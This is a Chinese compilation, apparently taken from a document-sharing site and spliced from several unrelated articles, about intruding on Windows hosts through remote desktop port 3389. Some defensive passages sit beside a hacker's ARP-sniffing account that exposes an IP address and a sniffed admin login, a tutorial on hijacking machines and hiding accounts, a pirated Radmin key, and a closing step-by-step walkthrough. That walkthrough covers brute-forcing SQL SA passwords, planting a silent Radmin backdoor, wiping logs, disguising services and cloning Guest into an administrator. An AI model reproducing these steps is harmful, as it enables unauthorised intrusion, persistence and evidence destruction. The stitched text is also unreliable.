黑客经验谈系列之入侵3389起源完整编
- 格式:doc
- 大小:46.50 KB
- 文档页数:3
3389攻击原理
3389攻击原理是基于Windows终端服务(Terminal Services)的默认端口号3389进行的。
微软为了方便网络管理员远程管理及维护服务器而推出了这个服务,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上。
黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门账号,然后再开启对方的终端服务,这样,自己就可以随时使用终端服务来控制对方了。
这种主机的操作和控制就像操作自己的计算机一样方便。
由于终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。
这样的主机通常被称为“3389肉鸡”。
为了防范3389攻击,需要加强网络安全防护,定期更新操作系统和应用程序的安全补丁,限制不必要的远程访问和关闭不必要的端口和服务等措施。
同时,对于个人用户而言,也需要提高网络安全意识,不轻易打开未知来源的邮件和链接,及时更新防病毒软件等。
黑客入侵技术及相关应对措施自动化0603 060901112 毛懿黑客是“Hacker”的音译,源于动词Hack,其引申意义是指“干了一件非常漂亮的事”。
这里说的黑客是指那些精于某方面技术的人,对于计算机而言,黑客就是精通网络、系统、外设以及软硬件技术的人。
随着时代的发展黑客行为有了以下的发展趋势。
1、手段高明化,逐步形成了团体,利用网络进行交流和团体攻击。
2、活动频繁化,做一个黑客已经不再需要掌握大量的计算机和网络知识,黑客工具的大众化是黑客活动频繁的主要原因。
3、动机复杂化,目前已不再局限于为了国家、金钱和刺激,还和国际的政治变化、紧急变化紧密的结合在一起。
黑客的攻击可以归纳为以下几步:信息搜集、实施攻击、善后处理。
信息搜集主要包括:系统管理员的信息,网络的拓扑结构,何种操作系统,目标网络上的服务器,可能的安全漏洞等。
信息搜集实现的方法:1、利用网上的公开协议或工具,如:Finger协议、SNMP协议、Traceroute程序等2、利用合适的扫描工具,如:利用ISS,SA TAN等,对整个网络或子网进行扫描,以寻找安全漏洞。
在我们实际的生活中我们也往往会常常会遇到这些问题。
1、木马入侵木马也许是我们最深恶痛绝的东西了,相信不少朋友都受到过它的骚扰。
木马有可能是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传的(例如下面会提到的ipc$共享入侵);也可能是我们浏览了一些垃圾个人站点而通过网页浏览感染的(利用了ie漏洞);当然,最多的情况还是我们防范意识不强,随便运行了别人发来的所谓的好看的动画之类的程序或者是在不正规的网站上随便下载软件使用。
一旦被植入木马那么我们的掌上生活就好像是在别人的监视器下工作学习一样,不仅仅是被监控,同时木马的植入者可以在对于他们有力的时候侵入从而来获取他们的利益,当然也有些仅仅是抱着一种恶毒的心理,他们植入木马并不追求自己的利益而是乐于损坏人家的利益,那些木马自动运行的不仅仅是木马程序本身还有附带的大量的垃圾程序,通过木马的侵入在你自身最薄弱的地方撒野,这些垃圾程序由于有了木马打开了保护层而肆意妄为,最典型的就是最近几年比较流行的一种木马他先强迫解除管理器里面的杀毒软件和360的保护,从而使一些并不是很厉害的垃圾软件横行电脑,而正是由于这些保护措施的破坏直接导致了我们没有工具去进行清除,从而大大增加了工作量也正因为此大大提升了此木马的威力。
入侵个人主机网络攻击的步骤第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
遇到一个客户的服务器被黑客利用嗅探数据入侵并用来挟持,对方还公布了具体的入侵过程,现在正好以他为实例来说下此类问题的处理方案!以下是黑客发来的入侵过程文档。
------------------------------------------------------------这里说下同机房是怎么拿到后台权限的?前提是你们的IP我知道,123.120.218.153就得看看这个IP段123.120.218.1-123.120.218.254 的机器网关是不是一个这里的默认网关就相当于我们的电脑网络连接- 本地连接- 支持-看到的默认网关,我这里是192.168.1.1 服务器IP都是独立的网关也是这下确定了我就得去入侵123.120.218.1-123.120.218.254这个段的服务器了这里就不说了,过程看情况,我搞到了3台这个段的机器,发现都是同个网关123.120.218.1 就确定了你的机器也在其中然后就利用工具cain4.9 还有hijack之类的ARP工具,扫描完同IP段你们的机器也获取了MAC 有3个IP那时你们用的后台是http://123.120.218.152:89 我嗅探http数据post 提交包当然选择89端口,3389终端端口也没改,就顺便嗅探了凌晨开始嗅探的,差不多第二天起来看数据就出来了。
其中就包括http://liyongzhi001:519A335B666C ... /admin365/Login.asp。
这里lizhongzhi001就是帐号密码当然是519A335B666C384还有扫了下网站的目录,发现居然还有http://123.120.218.152:89/wwwroot.rar拿后台权限没花多少时间,就3389密码我等了几天你们登录过才会嗅探到。
------------------------------------------------------------关于服务器的选择,我这里发现唯一,群英和数据中国的服务器都具有ARP 硬件防护你可以考虑这里的机器或者下次你租服务器时我去检测下,不用你租的服务器,我自己去弄都行告诉我IP段你们租的高防服务器也有防御,相对来说是最好的,毕竟价格在那里------------------------------------------------------------说说服务器密码:帐号最好别默认administrator 设置个别的名字,这个以防万一而已密码别太常用了,我设置密码都是乱输入的。
网络安全知识:走进黑客世界——了解入侵技巧背后的原理随着互联网的日益普及,网络安全问题逐渐成为一个重要的话题。
黑客攻击、网络钓鱼、恶意软件等安全威胁层出不穷,给人们的日常生活和企业的经济利益带来了严重的威胁。
了解黑客入侵的技术原理,可以帮助我们更好地保护个人隐私和企业敏感数据。
本文将介绍一些黑客入侵技术的原理。
一、端口扫描端口扫描是入侵者最常使用的一种技术。
端口扫描基于TCP/IP协议,可以探测目标系统开放的服务和技术。
入侵者可以利用端口扫描工具探测目标系统开启的服务和服务版本,以查找系统漏洞。
当发现目标系统存在漏洞时,入侵者可以利用该漏洞实现攻击。
因此,端口扫描是黑客攻击中不可或缺的一环。
二、漏洞利用漏洞利用也是一个常用的攻击方式。
漏洞是系统、软件或硬件中的错误或漏洞,入侵者可以利用这些漏洞入侵目标系统,并获取系统的控制权。
漏洞利用可以帮助攻击者绕过身份验证、窃取敏感数据、传播恶意软件等。
漏洞利用技术的高超程度也是黑客攻击成功的重要因素之一。
三、社会工程学社会工程学是一种利用社会心理学原理和技术手段,通过与人进行交流、欺骗或诱骗,获取目标信息的技术。
社会工程学利用的是人的天性,通过操纵目标的心理,使其放下对自身信息的警惕,避免采取安全措施。
入侵者可以利用社会工程学技术获取目标系统的访问凭证,绕过防火墙、破解密码等。
由于这种攻击方式难以防范,因而社会工程学被认为是一个比技术漏洞更具威胁性的攻击方式。
四、拒绝服务攻击拒绝服务攻击(DDoS)是通过向目标主机发送大量的数据请求,并使其过载或宕机的网络攻击方式。
这种攻击不会直接入侵目标系统,但它可以使目标系统无法正常运行,从而造成经济损失和用户不满。
DDoS攻击通常遵循三阶段:recon,weaponize和execute。
在第一阶段,攻击者通过各种方法进行侦察,确定服务器的IP地址和应用程序。
在第二阶段,攻击者选择攻击方式,并利用工具包编写攻击代码。
“抓鸡”教程从入门到精通——小小鸟必看最近论坛搞了免费培训第一期活动,听说大家都用上了服务器,收获颇丰,日抓几千只也不是梦。
但是几个问题广大菜菜们要注意:(哈哈,我是鸟蛋,没有肉鸡的了,只是做一下学术交流,不要用砖拍我啊)1 怎样给肉鸡XP双开3389?2 怎样给2000 2003系统建立超级隐藏账户?3怎么清除入侵肉鸡或服务器的脚印?我从我们华夏论坛把这几个方面的贴子工具汇总了一下,实用为主,请菜友们看看全自动XP双开3389一键搞定。
经过本人多次测试~~100%没问题~(上传到空间里,结合远控的批量下载+运行``效果很不错。
)唯一不足就是会弹出一个cmd窗口~算小半个创作吧!注意:如果弹出cmd就被关了。
命令没有执行完,当然双开不成功。
就别来问我为什么开不了什么的了!!【黑客视频教程-建立超级隐藏帐户】华夏黑客同盟论坛 - 【黑客视频教程-建立超级隐藏帐户】清除日志什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。
在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。
日志对于系统安全的作用是显而易见的,无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。
无论是攻还是防,日志的重要性由此可见。
下面我们就来简单讨论一下日志文件的清除方法。
一、日志文件的位置Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT系统日志文件:%systemroot%system32configSysEvent.EVT应用程序日志文件:%systemroot%system32configAppEvent.EVT有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
80端⼝、512端⼝、3389端⼝……⼊侵实例有很多⽹站为了安全起见,在WEB Server前⾯架了防⽕墙,或者做了TCP/IP过滤,对外只开放TCP 80端⼝。
从⼊侵者⾓度来看,要⼊侵那么从80上跑的CGI⼊⼿是⽐较可⾏的,当然也可以⽤别的办法,例如旁敲侧击,呵呵。
从⽹管⾓度来看,⼀是要保证CGI的安全性,另外⽹络的整体安全性也是很重要的。
针对基于80端⼝⼊侵、防范⽽出的CGI扫描器数不胜数,但基本上原理都⼀样。
CGI扫描器原理说起来其实⾮常简单,可以⽤四句话来概括:连接⽬标WEB SERVER;发送⼀个特殊的请求;接收⽬标服务器返回数据;根据返回数据判断⽬标服务器是否有此CGI漏洞。
当管理的服务器达到⼀定数量的时候,⼿⼯检测⾃⼰的服务器是否存在各种各样的CGI漏洞,那就太消耗时间和精⼒了,所以⼀个⽹管⼿上有个⽐较好⽤的CGI漏洞扫描器还是必要的。
OK!今天我们就⾃⼰来动⼿⽤C写⼀个简单的CGI扫描器,帮助⾃⼰在⽇常⼯作中检测服务器:)) 源代码如下,很多地⽅我都加了注释,别嫌我烦哦:))编译好的程序可以从/program/cgicheck.exe 下载。
/************************************************************************* Module:CGICheck.cpp Author:ey4s Date:2001/5/16说明:这是⼀个Console下多线程,带有进度显⽰的CGI扫描器的模板,更改⼀下szSign和SendBuff就可以扫描其他CGI漏洞,设置了连接、发送、接收超时,速度还可以哦。
希望可以帮助到admins检测⾃⼰的服务器:)) *************************************************************************/ #i nclude #define iPort 80//⽬标Web Server端⼝#define szSign “500 13rnServer: Microsoft-IIS/5.0”//根据此标志来检查⽬标是否有漏洞 #pragma comment(lib,“ws2_32.lib”) /////////////////////////////////////////////////////////////////////////// // //定义&初始化全局变量// char *SendBuff=“GET /NULL.printern”,//发送的请求buff CurrentTarget[52]=,//存放最后⼀个线程将扫描的⽬标turn[4][2]=;//显⽰进度时的字符intSendBuffLen=strlen(SendBuff),//发送的buff长度iConnTimeout,//TCP Connect TimeOut ii=0,//扫描进度iTotal;//服务器总数HANDLE hSemaphore=NULL,//信标内核对象句柄,⽤来控制线程数量hStdout;//console标准输出句柄,做进度显⽰的时候⽤的struct timeval timeout;//连接、发送和接收的超时值DWORD SleepTime;//每个⼀个线程后等待的时间/* SleepTime值根据⽤户输⼊的线程数量[ThreadNum]和TCP ConnectTimeOut[CONNTIMEO]来计算。
专题二、3389攻击与防范实用技巧Simeon(一)远程终端攻击防范实用技巧1.实用技巧之一修改默认端口默认状态下远程桌面使用的端口一般为“3389”,如果不及时将这个端口号码更改掉的话,那么许多别有用心的黑客可能会利用这个端口,来远程控制和入侵本地工作站,以便窃取保存在本地工作站中的各类隐私信息。
目前还有单独针对远程终端攻击的软件,如果您设置的密码碰巧在他的攻击字典中,那么很不幸的告诉你,你的计算机将被攻陷,有关这方面的详细技术细节请关注本专题的子专题——《来自俄罗斯黑客的秘密——3389口令暴力破解》,因此在系统管理中修改默认端口就非常有必要了。
修改默认端口3389为其他任意未使用的端口即可。
下面介绍两种方法来修改端口: (1)图形界面修改首先以特权身份(管理员)登录进本地工作站或者服务器系统,用单击系统桌面中的“开始”-“运行”命令,从弹出的系统运行框中,输入字符串命令“regedit ”,单击“确定”按钮后,打开本地工作站的系统注册表编辑界面;在该编辑界面的左侧显示区域,用鼠标展开HKEY_LOCAL_MACHINE 注册表分支,从其后弹出的分支列表中依次选中 SYSTEM\CurrentControlSetControl\Terminal Server\Wds\rdpwd\Tds\tcp 子键,在tcp 子键所对应的右侧显示区域中,我们会看到一个名为PortNumber 的子键(如图1所示),这个子键其实就是用来定义远程桌面端口号码的,默认是以十六进制显示为“0X00000D3D ”。
双击该键值即可将该子键的数值设置成其他端口号码,如图2所示,在数字数据中可以任意输入一个未使用的端口,一般设置大端口号即可,例如可以将其数值设置成“8888”。
图1 通过注册表查看3389的端口信息图2 修改3389的端口完成数值修改操作后,我们再将鼠标定位于注册表分支 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp ,在RDP-Tcp 子键所对应的右侧显示区域中,我们同样会看到一个名为PortNumber 的子键,把该子键的数值也要一并修改过来,例如这里我们也要将它的数值修改成“8888”。
工具:WINNTAutoAttack自动攻击器(扫自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWo mK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
制作RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4
5
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar制作成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏覆盖方式:覆盖所有文件
-->>确定-->>确定
生成完成。
四.用RADMIN客服端连接
上传文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,这个要把里面的WINNT改为Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上传一个反弹后门RADMIN进入TELNET。
运行c:\\winnt\\3389.exe,重启肉鸡。
五.重启后用远程桌面远程器连上去
这里就有时会出现个问题。
使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。
telnet对方ip,发现需要NTLM 身份验证。
我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。
修改cmd的快捷方式属性为允许其他身份登陆。
然后运行桌面上的cmd.exe的快捷方式。
输入帐号mint密码mint,telnet 对方ip,直接可以登陆对方电脑了。
使用命令:
c:\\query user (查看对方目前终端登陆状况。
)
运行命令:
c:\\logoff 1(踢出去一个管理者)
再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)
六.连上后..在cmd下运行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)
七.打SA空口令补丁
程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)
-->>Windowst身位验证登陆
复制一下代码:SELMIS
按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。
八.改3389端口和服务名称
修改服务器端的端口设置,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
第二个地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\WinStations\\RDP-Tcp]PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
要重启系统才能用新端口连。
(不急..改了他的服务名再重启系统吧)
导出3389服务的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的键值为mm.reg文件。
编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务..别的服务也行) 。
再把第十行的"Description"="(这里是服务说明,改为你所换的服务
说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。
)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,改为你所换的服务名称,这里改为Alerter)。
保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务管理器..把Alerter的服务先停止)。
再在CMD下
九.注消后(注消比直接关要好些)用Radmin重启肉鸡
十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号
1.使用psu.exe展开注册表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。
如:psu –p regedit –i 157
将Guest克成管理员权限,克成管理员权限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。
导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据),然后删除Guest的配置。
2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。
3.将Guest的配置(二个REG文件导进注册表)。
4.修改
5.实验被禁止的帐户Guest是否可用。
6.用Guest
整个过程结束。
最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。
整个过程全部结束,这机子就真正变成你的肉鸡了。